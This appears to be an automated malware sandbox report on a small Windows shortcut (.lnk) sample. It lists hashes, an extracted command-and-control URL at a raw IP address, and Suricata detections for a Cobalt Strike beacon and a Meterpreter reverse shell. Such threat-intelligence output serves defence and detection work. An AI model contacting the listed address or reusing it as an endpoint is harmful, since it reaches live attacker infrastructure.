General
-
Target
21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
-
Size
1KB
-
Sample
220701-kqe6kscaak
-
MD5
e3f89049dc5f0065ee4d780f8aef9c04
-
SHA1
ba5fcbdbd5b71bfc52b8a824bd40c547a7223260
-
SHA256
21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
-
SHA512
a4f8e14e9caa4c32bb5dcd97d3ac4a050ba63172429172de78c145f05e12c4982fcbb4200cf179da254f70dcf3a0587e5898a0df0bb47beec6a1fc1c44b8a5d9
Static task
static1
Behavioral task
behavioral1
Sample
21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20.lnk
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20.lnk
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://120.48.85.228:80/favicon
Targets
-
-
Target
21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
-
Size
1KB
-
MD5
e3f89049dc5f0065ee4d780f8aef9c04
-
SHA1
ba5fcbdbd5b71bfc52b8a824bd40c547a7223260
-
SHA256
21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20
-
SHA512
a4f8e14e9caa4c32bb5dcd97d3ac4a050ba63172429172de78c145f05e12c4982fcbb4200cf179da254f70dcf3a0587e5898a0df0bb47beec6a1fc1c44b8a5d9
Score10/10-
suricata: ET MALWARE Cobalt Strike Beacon Observed
suricata: ET MALWARE Cobalt Strike Beacon Observed
-
suricata: ET MALWARE Meterpreter or Other Reverse Shell SSL Cert
suricata: ET MALWARE Meterpreter or Other Reverse Shell SSL Cert
-
Blocklisted process makes network request
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-